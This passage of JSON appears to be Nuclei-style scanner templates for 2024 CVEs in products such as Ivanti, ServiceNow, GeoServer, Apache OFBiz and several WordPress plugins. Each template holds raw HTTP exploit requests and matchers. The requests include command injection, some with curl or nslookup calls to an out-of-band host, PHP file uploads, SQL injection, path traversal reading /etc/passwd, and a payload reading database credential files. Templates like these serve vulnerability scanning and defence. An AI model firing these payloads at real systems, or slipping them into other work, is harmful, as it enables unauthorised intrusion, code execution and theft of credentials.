200","contains_all(body,\"status\\\":\",\"scoreMessage\",\"displayScore\")"],"condition":"and"}]}]},{"id":"CVE-2024-29269","info":{"name":"Telesquare TLR-2005KSH  - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>","</xml>","Ethernet","inet"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6366","info":{"name":"User Profile Builder < 3.11.8 - File Upload","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/plugins/profile-builder\")"],"internal":true}]},{"raw":["POST /wp-admin/async-upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"wppb_upload\"\n\ntrue\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"meta_name\"\n\n{{filename}}.gif\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"_wpnonce\"\n\ne8\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"action\"\n\nupload-attachment\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"async-upload\"; filename=\"{{filename}}.gif\"\nContent-Type: image/jpeg\n\nGIF89a\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"id\"","\"uploadedTo\""],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5217","info":{"name":"ServiceNow - Incomplete Input Validation","severity":"critical"},"requests":[{"raw":["GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j=\"jelly:core\"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File(\"\").getAbsolutePath();z=z.substring(0,z.lastIndexOf(\"/\"));u=new+SecurelyAccess(z.concat(\"/co..nf/glide.db.properties\")).getBufferedReader();s=\"\";while((q=u.readLine())!==null)s=s.concat(q,\"\\n\");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["glide.db.user"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6188","info":{"name":"TrakSYS 11.x.x - Sensitive Data Exposure","severity":"medium"},"requests":[{"raw":["GET /TS/export/pagedefinition?ID=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["TrakSYS Version","Name","Altname"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0939","info":{"name":"Smart S210 Management Platform - Arbitary File Upload","severity":"critical"},"requests":[{"raw":["POST /Tool/uploadfile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywnsogfin\nAccept-Encoding: gzip, deflate, br\n\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"contents.php\"\nContent-Type: application/octet-stream\n\n<?php print({{num1}}*{{num2}}); ?>\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"txt_path\"\n\n/home/{{filename}}.php\n------WebKitFormBoundarywnsogfin--\n","GET /home/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25669","info":{"name":"CaseAware a360inc - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=test%27%20draggable=true%20ondrag=alert(document.domain)%20value=%27p"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value='test' draggable=true ondrag=alert(document.domain)","CaseAware"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5827","info":{"name":"Vanna - SQL injection","severity":"critical"},"requests":[{"raw":["POST /api/v0/train HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"sql\":\"SELECT pg_read_file('/etc/passwd', 0, 1000);\"}\n"],"matchers":[{"type":"word","words":["id\":"],"internal":true}]},{"raw":["GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2024-0305","info":{"name":"Ncast busiFacade - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /classes/common/busiFacade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"name\":\"ping\",\"serviceName\":\"SysManager\",\"userTransaction\":false,\"param\":[\"ping 127.0.0.1 | id\"]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","#str"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33605","info":{"name":"Sharp Multifunction Printers - Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/installed_emanual_list.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ServiceEmanualList","/installed_emanual_down.html"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-44849","info":{"name":"Qualitor <= 8.24 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"idtipo\"\n\n2\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmfilestorage\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmdiretoriorede\"\n\n.\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmbucket\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmaccesskey\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmkeyid\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"fleArquivo\"; filename=\"{{filename}}.php\"\n\n<?php echo md5({{num}}); ?>\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"cdfilestorage\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849--\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"parent.showQAlert(\\'Upload\", \"showQAlert\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /html/ad/adfilestorage/request/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-27199","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/../admin/diagnostic.jsp","{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp","{{BaseURL}}/update/../admin/diagnostic.jsp"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"Debug Logging\", \"CPU & Memory Usage\")"],"condition":"and"}]}]},{"id":"CVE-2024-39903","info":{"name":"Solara <1.35.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23692","info":{"name":"Rejetto HTTP File Server - Template injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["rejetto"]}]}]},{"id":"CVE-2024-21887","info":{"name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","severity":"critical"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"result\":","\"message\":"],"condition":"and"}]}]},{"id":"CVE-2024-5932","info":{"name":"GiveWP - PHP Object Injection","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/give_forms/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["\"type\":","\"guid\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".[0].slug"]},{"type":"json","part":"body","name":"give-form-title","internal":true,"json":[".[0].title.rendered"]},{"type":"json","part":"body","name":"links","internal":true,"json":[".[0].link"]}]},{"raw":["GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["give-form-hash","give-form-id-prefix"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"give-form-hash","internal":true,"regex":["name=\"give\\-form\\-hash\" value=\"([0-9a-z]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id-prefix","internal":true,"regex":["name=\"give\\-form\\-id\\-prefix\" value=\"([0-9-]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id","internal":true,"regex":["name=\"give\\-form\\-id\" value=\"([0-9]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-amount","internal":true,"regex":["give\\-form\\-minimum\"\\n\\s+value=\"([0-9.]+)\"\\/>"]}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ngive-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"error_data\"","\"unknown_error\""],"condition":"and"}]}]},{"id":"CVE-2024-7928","info":{"name":"FastAdmin < V1.3.4.20220530 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET /index/ajax/lang?lang=../../application/database HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["jsonpReturn(","\"password\":","\"username\":","\"database\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/javascript"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-34982","info":{"name":"LyLme-Spage - Arbitary File Upload","severity":"high"},"requests":[{"raw":["POST /include/file.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------575673989461736\n\n-----------------------------575673989461736\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\nContent-Type: image/png\n\n<?php echo \"{{string}}\";unlink(__FILE__);?>\n-----------------------------575673989461736--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"code\":","\"msg\":","php\"}"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","part":"body","group":1,"regex":["\"url\":\"([/a-z_0-9.]+)\""],"internal":true}]},{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"{{string}}\" )","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-45195","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noutpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename={{filename}}.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard\n","GET /common/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<?xml version=","entity-engine-xml"],"condition":"and"},{"type":"word","part":"content_type_2","words":["text/plain"]}]}]},{"id":"CVE-2024-4956","info":{"name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-7954","info":{"name":"SPIP Porte Plume Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?action=porte_plume_previsu HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndata=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["Composed-By: SPIP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33610","info":{"name":"Sharp Multifunction Printers - Cookie Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sessionlist.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No.","User","From","Last login","Last access","Language ID","Cookie"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28987","info":{"name":"SolarWinds Web Help Desk - Hardcoded Credential","severity":"critical"},"requests":[{"raw":["GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username+':'+password)}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["displayClient","shortDetail"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-20767","info":{"name":"Adobe ColdFusion - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1\nHost: {{Hostname}}\n","GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1\nHost: {{Hostname}}\nuuid: {{extracted_uuid}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'wddxPacket')","contains(header_2, 'application/json')","contains(body_2, '/bin/bash')"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"extracted_uuid","group":1,"regex":["<var name='uuid'><string>(.*)</string>"],"internal":true}]}]},{"id":"CVE-2024-3922","info":{"name":"Dokan Pro <= 3.10.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["Dokan product"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: {{Hostname}}\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302"],"condition":"and"}]}]},{"id":"CVE-2024-2879","info":{"name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"],"matchers":[{"type":"word","internal":true,"words":[".ls-clearfix:before"]}]},{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"<script>\")"],"condition":"and"}]}]},{"id":"CVE-2024-23167","info":{"name":"GestSup - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /ajax/calendar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=add_event&title=<img/src/onerror=alert(document.domain)>&start={{formatted_date}} 07:30:00&end={{formatted_date}} 23:00:00&allday=false&technician=1\n"],"matchers":[{"type":"word","part":"response","words":["{\"event_id\":\"","text/html"],"condition":"and","internal":true}]},{"raw":["POST /index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&pass={{password}}&submit=submit\n","GET /index.php?page=calendar HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view=activity","?page=calendar","<img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2024-6289","info":{"name":"WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"WPS Hide Login\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?gf_page={{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), \"wp-login.php\")","contains(header,\"%2F%3Fgf_page%3D{{string}}&reauth=1\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-7120","info":{"name":"Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection","severity":"medium"},"requests":[{"raw":["GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60  HTTP/1.1\nHost: {{Hostname}}\n","GET /tmp/info.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37032","info":{"name":"Ollama - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/pull HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n","POST /api/push HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"http://{{interactsh-url}}/rogue/{{randstr}}\", \"insecure\": true}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest')"],"condition":"and"}]}]},{"id":"CVE-2024-33113","info":{"name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<service>DEVICE.ACCOUNT</service>","<seqno>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25735","info":{"name":"WyreStorm Apollo VX20 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/device/config"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"password\":","\"softAp\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37152","info":{"name":"Argo CD Unauthenticated Access to sensitive setting","severity":"medium"},"requests":[{"raw":["GET /api/v1/settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"passwordPattern\":","\"appLabelKey\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32709","info":{"name":"WP-Recall <= 16.26.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6842","info":{"name":"AnythingLLM - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/setup-complete"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"AuthToken\\\":true\", \"ApiKey\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"},{"type":"word","part":"body","words":["\"AgentGoogleSearchEngineId\":","-\"AgentGoogleSearchEngineKey\":'","\"AgentSerperApiKey\":","\"AgentBingSearchApiKey\":"],"condition":"or"}]}]},{"id":"CVE-2024-22320","info":{"name":"IBM Operational Decision Manager - Java Deserialization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["javax.servlet.ServletException"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2024-5936","info":{"name":"PrivateGPT < 0.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/file=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-6587","info":{"name":"LiteLLM - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /chat/completions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"model\": \"command-nightly\",\n  \"messages\": [\n    {\n      \"content\": \"Hello, how are you?\",\n      \"role\": \"user\"\n    }\n  ],\n  \"api_base\": \"https://{{interactsh-url}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["Bearer"]}]}]},{"id":"CVE-2024-6926","info":{"name":"Viral Signup <= 2.1 -  SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/viral-signup\")"],"internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wow_signup_send_free&idsignup=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-36401","info":{"name":"GeoServer RCE in Evaluating Property Name Expressions","severity":"critical"},"requests":[{"raw":["GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"extractors":[{"type":"regex","name":"typename","part":"body","group":1,"regex":["typeName=([^&\\]]+)"],"internal":true}]},{"raw":["@timeout 20s\nGET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"content_type","words":["application/xml"]}]}]},{"id":"CVE-2024-29973","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /cmd,/simZysh/register_main/setCookie HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"c0\"\n\nstorage_ext_cgi CGIGetExtStoInfo None) and False or __import__(\"subprocess\").check_output(\"echo {{string}}\", shell=True)#\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'errmsg0\": \"OK')","contains(header, 'application/json')","contains(body, '{{string}}')"],"condition":"and"}]}]},{"id":"CVE-2024-39250","info":{"name":"EfroTech Timetrax v8.3 - Sql Injection","severity":"high"},"requests":[{"raw":["GET /Login.aspx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"TimeTrax - Cloud HR Software\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /search.aspx?q=' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Incorrect syntax near\",\"Unclosed quotation mark after the character string\")","contains(content_type, \"text/html\")","status_code == 500"],"condition":"and"}]}]},{"id":"CVE-2024-40422","info":{"name":"Devika v1 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /api/data HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"models\",\"projects\",\"OPENAI\",\"OLLAMA\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36527","info":{"name":"Puppeteer Renderer  - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32113","info":{"name":"Apache OFBiz Directory Traversal - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["java.lang.Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3136","info":{"name":"MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?template=../../../../../../../../usr/local/lib/php/pearcmd&+config-create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stm_lms_load_content&nonce={{nonce}}&\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_2),\"config-create: must have 2 parameters\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["\"load_content\":\"(\\w+?)\""],"group":1,"internal":true,"name":"nonce"}]}]},{"id":"CVE-2024-24763","info":{"name":"JumpServer < 3.10.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /{{paths}} 